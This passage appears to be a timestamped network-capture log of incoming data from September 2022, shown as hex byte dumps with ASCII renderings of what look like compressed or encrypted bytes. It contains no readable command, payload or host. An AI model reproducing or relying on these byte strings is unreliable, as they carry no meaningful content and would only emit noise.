                                                                                                                                                2022-09-29 12:51:45 UTC22217INData Raw: 47 4d 71 f1 c5 ab a0 d9 c8 fd 56 38 58 97 81 1d 40 ee ee b1 51 9c 0b 6f a0 94 c6 33 f6 ef 2d 53 4a c3 5e 94 39 0c 57 56 ae 18 95 e3 3b 8f 3a 86 a3 b0 f0 e5 be 21 81 08 ea bb 3b 16 d3 77 3a 56 0f a0 75 87 20 d8 9d 27 3d 3e da 5e 25 46 a1 1c 98 04 33 2a 90 ab 04 dd 38 83 01 b5 a1 d8 c6 fc fb bc f5 8b cf 5c db b2 b4 43 56 0f 7b 15 6d e4 67 f4 f9 8d 60 81 e6 20 80 df 67 c4 e9 bf 74 7c 8f db ce 36 cc 12 bc 18 29 15 fc e8 67 0c 88 3c 8d ad ef df 3e 44 a7 e6 e1 77 85 1a 00 b8 8d 47 96 98 d1 a0 aa f1 f6 fe bd 91 70 10 01 68 15 40 16 f7 1e 41 a1 60 cb c1 9f ae ce d6 28 9b 6f a5 8e ec 18 62 61 f1 19 58 8b 5a 56 1f 7c 4f 24 bd a4 98 90 0c 0c 62 54 e5 89 75 96 a3 49 a6 93 8f 03 21 51 dd 28 25 a0 16 83 06 8a de eb 7d 76 0f 69 31 63 6d 4e ae 31 55 94 fa 5a 33 3f eb a8
                                                                                                                                                Data Ascii: GMqV8X@Qo3-SJ^9WV;:!;w:Vu '=>^%F3*8\CV{mg` gt|6)g<>DwGph@A`(obaXZV|O$bTuI!Q(%}vi1cmN1UZ3?
                                                                                                                                                2022-09-29 12:51:45 UTC22233INData Raw: fc 6c 6a 3c 10 d6 fe 12 48 ce 40 8c 10 41 5f 92 b7 39 b7 56 60 dd 50 33 f4 05 e0 62 82 50 0a f7 a7 47 fc ba 8c 1c f3 66 d5 ee cb 2d e1 08 aa 4f 94 35 54 03 a1 24 f4 94 da 39 69 60 1a 03 46 1d 23 5b fe bc f1 71 10 b9 d7 84 4c 45 c3 3f 2c e2 b2 00 fb a0 b8 4d e9 4b 13 3e 3d 4b f3 72 30 64 46 18 67 5e 22 84 78 a9 59 b4 21 82 eb 05 de ad a7 68 d4 5c 73 b3 8c b2 c3 cf ac 0d 82 99 71 e9 30 43 6d 5a 1a 81 30 14 76 e0 23 c3 c3 bf 8e c6 8f 5d f9 d4 fb ac 98 d0 2b d6 cd b8 99 f4 18 6f c6 24 02 2c 52 01 aa 15 3b 18 c9 15 b8 2e 86 10 73 fe e9 eb 13 74 e3 df c9 72 88 a8 de 5f f9 0e 05 98 48 25 77 67 06 ad d0 11 2a 25 37 81 f2 97 d0 34 01 1d 6a ea 50 6a 9d 6c 53 e5 22 29 45 58 e8 79 0d b4 15 91 1b b3 56 96 7f 25 a0 61 35 df 23 35 52 b1 59 1a 3a 63 c6 72 d9 08 83 2e f3
                                                                                                                                                Data Ascii: lj<H@A_9V`P3bPGf-O5T$9i`F#[qLE?,MK>=Kr0dFg^"xY!h\sq0CmZ0v#]+o$,R;.str_H%wg*%74jPjlS")EXyV%a5#5RY:cr.
                                                                                                                                                2022-09-29 12:51:45 UTC22249INData Raw: 85 10 0d 67 f1 1c 83 cf e8 aa b8 f8 7f db 1c 93 2e a9 29 90 4c 5c f6 ee c5 7b 05 c0 28 28 96 21 28 b3 c8 83 cd 1b bd 0d 84 c2 0b 9b 5a 87 4e 07 9e b4 bc 2c da 03 c7 e5 53 6b 75 8a 41 47 ae b3 cd 22 cf 5b 64 ed 44 a5 14 60 54 52 8a bf 47 f6 35 3f f4 ef 08 8a 03 11 d4 d7 a8 1b 9b 87 77 9b 5d c1 63 8d 83 0a c8 5f ea e1 80 ac c8 2a c4 3f 2a 4e 4b 18 a6 52 4e 46 50 04 9a 7c 9d e3 7b b3 a1 b7 af e6 f8 da ef e5 fa 3d 78 89 e4 1b 8f 14 a1 0b 01 c0 c2 1d b4 56 47 fd 92 11 98 89 99 fe 4d 94 f4 30 b9 84 b7 23 22 fa 1d c0 9c 12 51 97 b9 37 92 9b 14 9b ae 2d de 06 39 26 a2 89 a0 a7 4b 18 d0 3d b7 90 c9 96 31 4e 46 7a a8 8f 3d a6 72 d2 b4 4e cc 35 37 8b 7d b6 ae 18 bd a3 11 0b 36 7f 58 e3 a0 2d 8d e4 bf 07 27 f4 39 a8 dc e4 3a 69 a7 72 18 99 16 b1 46 d0 0b 3b 0d de bc
                                                                                                                                                Data Ascii: g.)L\{((!(ZN,SkuAG"[dD`TRG5?w]c_*?*NKRNFP|{=xVGM0#"Q7-9&K=1NFz=rN57}6X-'9:irF;
                                                                                                                                                2022-09-29 12:51:45 UTC22265INData Raw: 51 0d 73 30 7a 90 ab 10 0d 5b 86 46 db ff 01 bc 22 9f 75 cc 07 93 a9 cf 32 74 2f da 88 20 dd f3 e9 6d 31 6e 99 47 de 4c 5a 22 dd f8 73 2b 49 91 75 b3 d3 74 cd 5d 17 5c 70 8b b0 12 68 ca 4b 29 ef 41 66 d0 f8 5a 93 ce b2 e8 4a a1 42 a8 12 ec b3 bc c9 2b 88 d9 da 5f fc af 07 da 74 87 39 1d 10 e6 f3 e0 82 1d 77 1e 35 55 7f 68 a1 e2 50 57 d7 e2 3d 01 0e b0 70 d0 23 39 e3 7a 4b 80 05 b8 9f 20 2a 53 d6 72 fd f4 eb 60 15 e7 f9 ef 92 0e 91 83 f9 30 a7 72 0c 55 88 c3 21 99 c0 86 45 b1 4f 93 17 6b e3 66 03 78 2f ce 0f 3b af 2a 31 ca 07 a0 cc f8 44 33 d5 4c 24 33 63 68 42 b8 07 7d b7 36 d4 a0 31 ff fa 4c 1b c6 70 01 7a e5 d7 31 ab 53 79 fe 41 4f c4 12 8d 5c 89 d1 b9 a6 85 06 86 16 a4 fd 9e 1e 9f e4 7e 8a 8e c8 23 fa a0 bc 4b 77 66 bb 3c 81 8b 2d 46 c7 9c f0 f4 84 13
                                                                                                                                                Data Ascii: Qs0z[F"u2t/ m1nGLZ"s+Iut]\phK)AfZJB+_t9w5UhPW=p#9zK *Sr`0rU!EOkfx/;*1D3L$3chB}61Lpz1SyAO\~#Kwf<-F
                                                                                                                                                2022-09-29 12:51:45 UTC22281INData Raw: 2c 01 9d 43 5d 24 2c 98 a7 36 c0 d4 ca 2f ee 6d de 5b d3 8e d0 15 e0 ce a7 d4 2a e8 24 a2 cd 0c e7 97 cd 33 c8 d4 86 4f a1 f3 cd 68 e6 78 28 73 5d d5 7e 22 d0 88 00 05 b3 98 2d 60 37 29 44 2c 43 92 02 d4 ec d7 72 58 01 89 a9 87 d0 4a 69 c6 7d 7d d2 b8 61 16 17 04 97 91 23 06 aa 6a 42 dd 02 76 76 46 c2 5a d9 86 c7 49 ba 7e 17 ca 02 1c 7f c9 98 dc 1f b6 66 1b ea b9 de b0 19 03 25 ad 1c 9d 88 3c 34 d7 d6 24 fa 7b 21 7b 30 dd 3d f5 af 34 8b ef 25 1c 81 de ca 32 1f 78 cc f2 89 7c 8d 31 3b aa 57 fb 1a bb 46 4e 26 3b 99 ce 51 bd dc ee ca a4 50 51 be 14 25 21 28 cd d7 49 a6 42 b3 42 95 22 81 d0 5f a9 f7 c5 98 cf 4e 7d 00 4c 59 38 ee f8 5c ea 3c f9 66 c3 87 de 41 43 26 f4 a7 6c a1 27 45 3c dc ff 03 ae 20 3d f3 5a e6 8c 24 05 af d9 83 20 67 c6 c2 65 bb 87 82 c5 87
                                                                                                                                                Data Ascii: ,C]$,6/m[*$3Ohx(s]~"-`7)D,CrXJi}}a#jBvvFZI~f%<4${!{0=4%2x|1;WFN&;QPQ%!(IBB"_N}LY8\<fAC&l'E< =Z$ ge
                                                                                                                                                2022-09-29 12:51:45 UTC22297INData Raw: de 45 ae f3 eb ae 61 67 8f d8 88 bb bb 4c 41 52 43 43 85 7b 9d 5a 0c 73 59 7f 88 02 0b be aa e5 10 b2 5b f2 ce 24 7b eb c7 f7 cd c2 c6 07 1e 42 67 e3 19 c8 a1 e6 7f b7 23 0d 0e 48 f7 f3 5c ff b0 e4 8c fd f7 37 70 c4 6a 40 f8 ba 93 9d f9 ab 14 e8 19 79 c7 15 a7 aa 0a 13 f4 c1 ad a2 aa 8c 2e 45 92 fa de f3 e5 23 cb 6e e1 56 f5 79 f6 23 df b6 7b f6 27 99 6a 20 81 51 ce 39 04 cf 4f a7 11 65 1d ad eb 18 ab 6d 52 76 f2 51 13 30 e5 a8 22 34 62 d5 d2 02 93 14 fb ea 3f d2 d1 49 d0 ae 7b a9 a4 b3 f4 69 8c 43 78 d1 16 d3 de 77 9c a7 9a fb ff 1c 13 ca 78 24 34 45 00 f6 f9 be f1 6b 1f 13 99 c7 1c 50 76 a5 64 16 12 29 b2 bc 01 10 18 00 0b 61 7a 79 a4 93 73 e3 81 24 b5 4e 25 78 87 06 76 f8 4c 14 f4 aa 1e 6c 79 81 f2 10 9d 11 e4 e7 c4 a9 27 b9 ca e0 a5 f5 6b 95 1e 54 9c
                                                                                                                                                Data Ascii: EagLARCC{ZsY[${Bg#H\7pj@y.E#nVy#{'j Q9OemRvQ0"4b?I{iCxwx$4EkPvd)azys$N%xvLly'kT
                                                                                                                                                2022-09-29 12:51:45 UTC22313INData Raw: 95 e6 0a 5b f9 b2 08 b4 74 0e b4 12 4c 1d a0 9a d3 9a 34 7f 24 df ae 08 9b 85 29 d4 e3 e6 7f d5 01 5a 49 78 ca a5 f8 79 42 73 4e 0e 0d fe 5b 7c 26 b2 8e 22 30 4f 28 87 85 b4 54 05 d4 cd f9 97 ab 05 68 83 05 3f 8b 53 b5 9e 4d c2 92 96 e8 fe ee d3 8c 72 68 c9 3b 9d b1 4b c0 9e 18 52 e5 c3 83 ad 64 29 6f 09 99 c8 f3 70 5b 45 f7 08 ed e9 1a 93 9b 58 3a 59 20 61 d8 ed e2 2e 1d 1f 52 9d 65 0a 26 90 d5 45 b8 7c 0a 04 db 87 8c 5b 29 12 b1 43 15 a4 33 38 b2 6c 06 c9 92 ff af b9 05 2a 80 65 d1 9b b3 61 f1 f7 b1 fa 37 99 74 aa 77 96 e7 df 7a ef 65 f6 06 16 98 2d e4 74 3d 9a ec 2f 57 0c 8f 44 df 2d a2 71 ea cc d9 78 f2 3e af f2 5e cf fb 5f be 0f 35 b2 60 80 af b1 81 67 7b 5e 6a 3b 55 a8 15 fd 2e 01 30 18 51 6c f6 24 6e ab 1e 23 85 19 c0 19 3c b1 e3 a7 8b 9f c0 d2 b8
                                                                                                                                                Data Ascii: [tL4$)ZIxyBsN[|&"0O(Th?SMrh;KRd)op[EX:Y a.Re&E|[)C38l*ea7twze-t=/WD-qx>^_5`g{^j;U.0Ql$n#<
                                                                                                                                                2022-09-29 12:51:45 UTC22329INData Raw: 12 5a 43 ec 95 6b 1b 74 58 5b bb dd 9b 91 3a d6 1f 1a 87 62 69 6c cd 72 74 7f 7d 93 62 a5 38 e9 64 3a cc 1d 77 43 ff 13 7a b6 4b 0b 5a 36 f7 38 a1 af 30 52 48 2f 83 f5 ba e1 b5 96 78 1b e1 5d c4 ad 27 bf c6 4c 6e 24 ff bc d0 bb 3a d7 e6 13 bd d4 fc a7 26 85 7a da 77 80 20 33 b0 19 4a 54 c1 fb df b9 91 ba c8 9a e6 72 24 f4 52 45 a9 7d 69 90 aa cb e5 ab c1 24 5b 5f 9d ce c1 3f 75 75 22 98 0a db 07 16 43 dd f8 b7 cc 8a 8f d0 cd d4 11 a9 f9 01 24 50 f6 cd 59 fa 67 ff 0a 43 93 05 31 f0 cd f7 19 c3 bc 0d 29 d9 43 b8 fb a1 fa af f3 f3 4d cc b7 b7 ff dd f9 e0 33 53 98 5f b8 df c7 f7 1e 49 fc 6d 89 3f 4a e8 4c a8 d7 ef a3 2f 78 d6 2f e6 0f df bb 27 6a 34 d7 78 56 35 94 a4 c4 23 08 33 b1 fa b3 11 ae 0f 70 b0 ac 02 ca 0f f1 42 48 05 ec bf 23 aa 04 f6 57 f7 64 6f 30
                                                                                                                                                Data Ascii: ZCktX[:bilrt}b8d:wCzKZ680RH/x]'Ln$:&zw 3JTr$RE}i$[_?uu"C$PYgC1)CM3S_Im?JL/x/'j4xV5#3pBH#Wdo0
                                                                                                                                                2022-09-29 12:51:45 UTC22345INData Raw: ea 67 6c 6c 84 43 65 5b 01 6b bb a3 c2 7d 26 9b a5 53 b0 47 16 04 37 08 7d 13 06 91 25 97 69 49 98 4f 36 38 68 83 42 01 97 f7 55 1d aa 09 aa 49 5d 7f 37 a3 7d 10 31 23 17 ef 9a 86 02 64 b2 23 d6 91 82 f4 fb 77 78 4b cd 2e 4a 2e 0d 89 cd e6 04 fa 93 71 ef 6b 68 08 b0 a3 5f 12 23 02 d4 41 74 23 45 c6 d2 64 09 d8 eb 83 e3 73 cc da c2 3e 43 54 52 3b d1 a7 f7 ee 61 6f 2f 7c 2e 28 c9 43 60 5e 88 42 af 58 a2 c8 c2 74 98 01 e8 da 3b dd d4 8c 62 98 49 86 1f 1d 67 73 07 7f c2 64 c4 13 83 d7 fe 32 a9 ab aa d9 e4 a9 66 74 5c 4c 2a 70 2a 72 cf 83 9a c2 ee 3f fc 20 1d d6 99 d7 5a d3 2d 34 7a 1a 9a 53 25 24 b8 4e ac eb ad 3f e4 89 47 6d 27 95 82 a2 b2 f7 cd 19 e0 c6 38 81 4c a9 ef dc 4a c2 a5 53 1c 71 aa 27 3d 73 a2 d3 7f 7f ed 61 9b 0b 0a 6b 9d 83 8f 87 01 1f 99 fc 7a
                                                                                                                                                Data Ascii: gllCe[k}&SG7}%iIO68hBUI]7}1#d#wxK.J.qkh_#At#Eds>CTR;ao/|.(C`^BXt;bIgsd2ft\L*p*r? Z-4zS%$N?Gm'8LJSq'=sakz
                                                                                                                                                2022-09-29 12:51:45 UTC22361INData Raw: 9c 9d a4 48 07 4e 40 2e 66 31 c0 ca fe c2 76 4c 98 f0 c5 95 ef ba f2 a1 d5 f8 2d eb 33 5f 1a 86 6b d6 f7 ce 99 a1 62 b2 4b d5 f0 a5 b2 68 66 b9 3e d8 07 63 84 d1 f0 b2 79 ef 1b 27 77 cf 43 bc a6 ff 78 b2 b9 ea e0 77 ac 75 35 a0 95 39 8d 70 0b 0b 07 1d a5 87 2a 91 d2 9e 28 b9 4d 1f cb 75 49 c3 41 5a ab ee 39 16 70 1d 79 8a 84 72 ca 36 e6 9f 6e 01 e3 35 9f e4 41 8d d6 98 97 d0 99 b6 97 2f 83 a1 25 67 2b 2e d5 e2 f0 f8 03 31 2d b0 ae c3 26 cb 76 09 53 ee c5 8d ec fa be 65 2a 00 37 e9 76 ff 36 cb bc 86 7a 33 cf e7 9b fc 3b 67 5a dc 0d 97 72 32 c3 57 48 d5 a3 87 d4 9c 9b 4f f9 82 58 ef 57 54 f4 eb ed b9 19 ed 7d 24 4d 23 2a 1b e1 3f fd 0f f7 48 29 52 28 6d 75 c9 d9 03 bf 0f 6e 87 08 cc 6d 4d 6f b2 90 73 75 32 49 9a 4b 1d 8c 98 41 35 91 2e 37 e3 7d a0 40 d2 48
                                                                                                                                                Data Ascii: HN@.f1vL-3_kbKhf>cy'wCxwu59p*(MuIAZ9pyr6n5A/%g+.1-&vSe*7v6z3;gZr2WHOXWT}$M#*?H)R(munmMosu2IKA5.7}@H
                                                                                                                                                2022-09-29 12:51:45 UTC22377INData Raw: e2 14 d7 e0 7f a9 1a 1e 85 07 ea a8 41 6d 0c 6e ef 8a e7 c7 06 8f dc c0 19 5f fb 3b b7 24 fe ae e9 07 27 94 40 04 be 79 47 e3 b7 5b 05 23 a9 5f f5 a9 14 dc 3d 2d fd 7d f8 9d f6 bd 2b 24 16 8b a4 9a 4d 97 a8 b8 2a 54 a5 62 b4 07 08 1c b2 e5 6f 06 71 a2 38 ca 8b a0 d9 ee 7b fe 86 0b 0d aa 22 75 a6 a3 41 f4 47 3f 7c 13 2e fa 53 01 be 39 33 57 98 8a 79 38 5e af bf c2 05 4c 14 8d 05 92 bf e8 28 9f 8a c2 77 94 3c ca f2 54 2d 99 a9 fa 1a aa b1 1d 1f b9 0b f2 c1 82 16 f3 9c 9c fa 83 4d d9 f6 b1 44 78 e8 bb 5e 57 bc 71 ba 28 1d 32 fc 41 ef f6 73 35 4d ba 64 43 c4 3e 00 a4 3f f4 e1 17 43 5b fd 0f c5 c5 d8 3d db d9 52 aa 95 73 59 08 0e 0b e3 10 55 04 51 9c 73 d9 3a fb d7 50 4b 6c fb 6e 74 27 d6 12 6b b2 c3 49 4f 7c ba c3 ad 92 fb b3 95 31 c6 02 9b 28 97 1b 01 85 72
                                                                                                                                                Data Ascii: Amn_;$'@yG[#_=-}+$M*Tboq8{"uAG?|.S93Wy8^L(w<T-MDx^Wq(2As5MdC>?C[=RsYUQs:PKlnt'kIO|1(r
                                                                                                                                                2022-09-29 12:51:45 UTC22393INData Raw: c0 aa bd 3a a1 0e dd b4 20 e5 fd ed 2c 7e 0c a4 94 c8 37 d1 2d 56 fb 40 9b 6d e3 4d b0 bd ba 28 61 99 6c 9e 8e 40 eb 6b 23 c8 1b 7d 7f bd 30 42 11 22 7b 26 47 ac d4 89 fe aa f5 28 66 6c c1 db fc ad 44 19 55 b9 e0 50 94 dd 05 db e2 fb cc 4d 9e 1f 24 13 17 5f b6 3d 54 9b e9 8f 4b dd 25 c1 3a e7 8c cc 18 5a c8 43 1c 95 83 dd 69 71 07 b2 0f 99 ac cc 02 e8 fd cd 52 62 eb 38 16 16 77 03 10 f0 13 c2 be 4a 43 3b ea 79 17 df 72 b7 a7 20 4d 38 2e 9d 17 66 31 76 d4 66 e3 8b 4b 2e 27 8a d5 3e 97 e5 c1 0e df e9 33 ed 8b 8a 58 dc e5 51 36 36 81 49 b4 1b b8 70 fb f9 a5 54 03 20 4c f1 78 7d 84 b8 ce 8e 3b 6b 93 59 91 97 b8 d3 f7 9d b9 08 8a 9b 6e 4d f1 94 59 5c e3 1e e9 f9 23 a0 04 2b f8 fb f8 e2 b8 49 5a e4 c6 04 a1 57 ee 13 41 6a 4a d6 84 36 4b f0 85 f2 24 c5 ce 3d 49
                                                                                                                                                Data Ascii: : ,~7-V@mM(al@k#}0B"{&G(flDUPM$_=TK%:ZCiqRb8wJC;yr M8.f1vfK.'>3XQ66IpT Lx};kYnMY\#+IZWAjJ6K$=I
                                                                                                                                                2022-09-29 12:51:45 UTC22409INData Raw: ff 67 00 a3 5f 75 18 18 ee 9e 9a 44 be ae 72 48 cf 55 cc 24 3f 7c 5a dc 04 67 02 3d f3 89 9b 3d e5 8b cf 32 69 c8 5f c9 ac 8d 44 1b c7 b8 9c e0 67 66 b1 06 fe 28 7d 91 0e d6 17 49 b1 a5 e8 96 58 50 57 d8 e4 c4 f5 ff 56 3d 14 3b 2e c9 a4 69 3d 49 a7 76 9c 0b 7c a1 bb 6c 01 c2 1e 6b a8 ec d7 62 c9 63 f1 38 ab cd 03 92 d9 fb ab 59 7a 67 fa e8 c6 25 e7 99 57 81 72 b1 2e bf b1 e1 43 5e 16 ad e3 3a 35 16 18 f2 d7 b0 6f 47 1f 64 6c 77 93 68 9c 13 cd be f8 43 41 64 f5 22 6f 33 95 86 17 2b 9e 5d 8c 4d cf 74 b5 f8 2b 70 b0 85 a9 88 14 71 f3 83 76 50 06 0c 8a 63 5a b5 4e bf 53 2a 7f a1 f3 7d a7 4b 26 4f 58 f1 b4 1c 63 8b f7 0b 26 af b3 d0 a7 05 7d b1 0f 0d e7 ff 6d f7 6b d8 ed dd 1c 88 bf ac ee 30 b7 cd 17 ba df eb 76 e3 aa d6 3e 48 98 f8 ac 20 74 82 e6 87 14 ac 50
                                                                                                                                                Data Ascii: g_uDrHU$?|Zg==2i_Dgf(}IXPWV=;.i=Iv|lkbc8Yzg%Wr.C^:5oGdlwhCAd"o3+]Mt+pqvPcZNS*}K&OXc&}mk0v>H tP
                                                                                                                                                2022-09-29 12:51:45 UTC22425INData Raw: c3 98 d9 17 fe 06 99 e4 7a 8c 05 02 5e 10 a2 1e b9 d3 f8 0e 37 21 41 ad a7 63 eb 8e de 6e d0 49 0c 6e 6a 20 81 da ac 4c 35 f9 62 67 31 86 84 38 1b 7c 57 3c a2 a0 3e 5d 56 d7 c0 70 36 79 f7 8d 14 01 73 c4 65 83 f3 f8 fc 27 da 47 5c 1f e6 e6 9f 05 b8 45 18 79 bc 34 4f 5a 72 7f 46 66 4a 16 f6 6e 18 a6 49 fb fe 5b 7b 41 dc 7e eb ee 4c f1 6f 1d 8a 7e 03 f3 a4 bb 1c f3 ff d8 11 ab 52 cf 8e ef 9c b3 f0 44 fc 28 e4 dc e9 44 8c 2b ec f9 fb e4 e3 d8 70 df 90 0a 48 a4 fa 13 18 5d 79 8c f4 2b ce 64 2d b7 48 20 06 a7 b9 e3 67 ed f3 43 ca 9c 75 1b bb d9 89 a6 b1 e8 81 c3 9e 46 25 36 4f db a8 b1 53 25 11 3f 2f 4c 47 dd 3e 7a 4b fc 00 00 92 a5 66 0a fb d0 9e 27 e7 61 9f f3 e3 b4 44 34 4b df 3b 5f db ff bf f2 7f 32 b8 f3 d6 6e ab 71 5f 11 ff 6d 05 1c 98 4d bf 20 4a 5b 00
                                                                                                                                                Data Ascii: z^7!AcnInj L5bg18|W<>]Vp6yse'G\Ey4OZrFfJnI[{A~Lo~RD(D+pH]y+d-H gCuF%6OS%?/LG>zKf'aD4K;_2nq_mM J[
                                                                                                                                                2022-09-29 12:51:45 UTC22441INData Raw: fb e0 64 ad fe 10 55 5e 38 06 81 34 eb b9 ce e6 f1 25 cc fd cf 8c bb 25 e8 fc b6 6d 09 1b ff 5e d3 05 f6 46 90 61 c0 5e d7 48 43 0d 41 fd 90 6c 08 c9 37 51 85 e1 e2 89 7b 46 76 56 ae 60 c0 0f 5b 18 2d 6a 44 a8 41 07 ab 3c 9f 1d 15 99 bf 2b 96 f5 9d 33 b8 94 d6 62 b6 c1 db 89 2d 24 cc d4 4c 38 de 47 9d 8c 22 09 dc 50 64 b9 cc f9 e6 15 ff e9 4c 68 06 19 7b 25 4e b5 59 68 6c ce d6 57 81 c2 78 7e 81 d7 16 ee 05 25 e8 91 ec 00 b3 18 5f 68 48 48 f3 45 98 68 f5 11 22 53 c1 e3 31 0a 18 15 e2 18 d4 72 b5 6f a2 0d 98 cc e5 7f c2 1c 0a a8 b5 80 0f 16 bd f5 f6 31 5a 40 7a cf ef 55 71 35 11 fe f2 a2 d6 11 55 59 7a 3c 52 b0 fe c5 1e c5 86 52 41 f3 72 d1 cb 89 eb 12 a1 66 f2 dc 1f 27 55 7f 86 e2 cb ea 7c 3c e1 20 58 55 06 81 bf bc 15 30 ad 6a 36 37 37 17 7b d1 04 48 3a
                                                                                                                                                Data Ascii: dU^84%%m^Fa^HCAl7Q{FvV`[-jDA<+3b-$L8G"PdLh{%NYhlWx~%_hHHEh"S1ro1Z@zUq5UYz<RRArf'U|< XU0j677{H:
                                                                                                                                                2022-09-29 12:51:45 UTC22457INData Raw: a5 0d ad 5e 61 71 de d7 10 06 b8 71 dd b1 c4 c5 ee d4 d4 e6 98 a7 e2 32 a5 f3 11 bd 19 68 27 6d b0 e2 a3 bd 80 09 92 d2 b9 4c d8 5e 6e fe 54 d1 72 dc 3a a9 ad 09 12 20 3d ee f8 ef 7f 32 2e 84 f0 93 30 9d 1d bd a1 6a 98 01 e7 ae 2e 4c d3 f2 cd 11 f5 9d 53 4a 18 a6 96 33 9e 76 74 53 0a d8 f2 ef bc 84 1c d4 4f 86 c0 5b b2 9f 74 4a 88 67 ba 81 e8 42 ff 74 34 1f df 2f 11 cb 2c 56 64 bd 7e e6 40 8b e7 cb 90 6d 61 b2 d2 50 e0 76 67 e4 f0 6b c0 8e 8e 8d a1 68 8f 76 f3 01 ed 41 22 d6 16 c8 73 a5 30 c2 ac 3d a1 d5 ec a6 47 94 08 ea b2 0e f7 e3 e3 84 b2 72 56 4d 75 20 da 62 f6 74 fb e6 e5 e4 ba 54 12 a9 ee 04 30 ba c2 23 1d f3 34 a6 71 d2 d2 58 03 e0 b7 66 28 01 42 94 cc ca dd cb 72 88 82 34 c2 32 10 e1 54 1d ab 20 1b a7 c8 bd e3 57 c6 37 0e 87 51 33 a0 c1 8f a0 52
                                                                                                                                                Data Ascii: ^aqq2h'mL^nTr: =2.0j.LSJ3vtSO[tJgBt4/,Vd~@maPvgkhvA"s0=GrVMu btT0#4qXf(Br42T W7Q3R
                                                                                                                                                2022-09-29 12:51:45 UTC22473INData Raw: 28 e2 a9 7f f1 1b d6 10 86 96 47 7f 02 dd 23 16 4b 06 c2 a3 a7 57 93 12 ee 5f 0f 70 5e be bd 78 71 51 39 be 47 ce 9c 84 49 c4 d2 79 6e 02 f4 65 df 0c 21 98 aa e1 06 a0 68 f4 65 0f 57 67 40 fc 2e da d1 45 7b 0e 00 a7 83 a9 b1 f3 be 7d 8f 96 a9 67 b9 b9 47 dc b5 72 20 39 6f 66 a9 5e 4b c1 c4 98 d7 9a 7d 74 79 64 6f 87 12 ac 13 ba ac a9 66 91 1c 62 12 32 ae 0f c6 22 4c 33 7f 65 a9 6a 6c 4e 44 df fe ea 8e 29 64 a8 fc 48 26 c6 c2 79 a8 11 2a e1 06 ce 2b ac d7 f9 c5 fb 12 f1 5e 74 ce 44 da 44 e4 bd e3 e1 d9 66 5f 9a b6 bd 9a 1c d0 c9 38 19 12 91 03 c5 58 fc eb 98 bd b1 be de b0 af 67 f5 1a 14 a8 7a b9 1a f0 92 c0 15 a2 9d 7b b5 57 4e 22 9e ec ce 4a c6 5a 6f 51 b6 39 44 16 28 6d ac 4e 51 b6 0f f7 1e 6f f6 12 62 38 15 4c 7b db fe 00 12 dc 36 25 65 5b a2 5c 73 be
                                                                                                                                                Data Ascii: (G#KW_p^xqQ9GIyne!heWg@.E{}gGr 9of^K}tydofb2"L3ejlND)dH&y*+^tDDf_8Xgz{WN"JZoQ9D(mNQob8L{6%e[\s
                                                                                                                                                2022-09-29 12:51:45 UTC22489INData Raw: b2 04 87 fb 36 2c 7a 7b 6c d1 8a e2 f6 31 38 15 9d 57 19 b7 05 21 25 6d 58 c3 be 43 61 bd e2 14 e1 d4 a1 07 80 52 3e 1b 81 0e cc 6d 74 28 a6 bf e5 b6 a1 d5 bc 3b c1 37 ed a4 c7 f3 2d 78 97 1f aa 71 5f 3f af c0 b4 4b ed da 80 9d 86 b8 a5 4d fc 6e 7e a1 6d b5 c0 ac 4f 65 df 8c 4a 37 4f 40 be cf 02 4d a6 2c 30 94 0b 4f f1 5c a5 06 a9 1b 0f 3d 3a ad c0 9c 49 a5 0a 32 d4 85 03 a7 7e 98 42 7b ba dc b6 b9 80 9e a9 33 95 12 99 22 f6 71 d3 24 c6 3b db 35 53 0a 28 7b 7d 7c 70 ae 4d d1 e6 8c 0a 6a 59 6a bb 3e 83 e3 7a c4 9f 3c 9b 9c 29 5a 79 44 98 bf 80 5b 96 1a 76 13 0b 1c f1 01 a5 57 1b 4d 28 fb cc 38 f8 77 13 7a ba 91 d4 0f 7c 42 8f 71 78 e7 51 5f 3f 30 a1 73 77 9b ae 83 e2 c0 da 59 63 4b 8f e0 da d5 e3 ed 82 8b 98 eb ad 63 39 93 eb ef 48 eb 53 4d 11 4f eb 87 47
                                                                                                                                                Data Ascii: 6,z{l18W!%mXCaR>mt(;7-xq_?KMn~mOeJ7O@M,0O\=:I2~B{3"q$;5S({}|pMjYj>z<)ZyD[vWM(8wz|BqxQ_?0swYcKc9HSMOG
                                                                                                                                                2022-09-29 12:51:45 UTC22505INData Raw: 8a 89 fc ca fa 82 e9 a2 c2 e5 97 4d ff 62 77 28 f7 93 88 30 ce e9 27 bd 06 f0 17 90 ad b6 93 88 eb be f6 89 64 6d bf 48 6d 6a cc ca 58 b3 10 75 e5 96 07 3d 4e 0a 1a f9 09 94 45 a9 24 20 5b 35 03 c2 4d ba 89 2f ab bf aa 0f f3 cc de 03 75 ae 96 b6 15 ac aa 71 83 6e 20 c0 a5 eb 20 34 be e3 31 d2 28 8f 7d d2 cc 8d 47 ef 2f 4b c8 33 03 b7 11 7c 4e 98 d8 4b 1c 65 ba 37 4e 92 1d 74 f6 e1 d2 80 5f 70 9a 4b 37 bc 5c de e5 56 2d 05 71 f7 c4 85 57 b8 d0 cf 9b 83 b5 98 27 28 9f c5 3c 8e 54 2a b8 47 3b 28 a6 ec 69 21 ad 4a b1 aa a8 bc 90 c7 cc 01 73 02 a7 48 84 eb 0a f4 61 55 2d 14 6d 2d 69 67 94 7b a9 b7 e1 99 83 77 6a 7a 85 c8 d0 33 db 56 5d bf 8f 94 c3 2c 00 30 b2 7b de 7b 5e c3 72 4e 76 08 6a 93 f1 ad 57 5f ae ea a8 aa 0e 94 2e cd 5f b0 77 37 05 38 97 7e 5b a4 b6
                                                                                                                                                Data Ascii: Mbw(0'dmHmjXu=NE$ [5M/uqn 41(}G/K3|NKe7Nt_pK7\V-qW'(<T*G;(i!JsHaU-m-ig{wjz3V],0{{^rNvjW_._w78~[
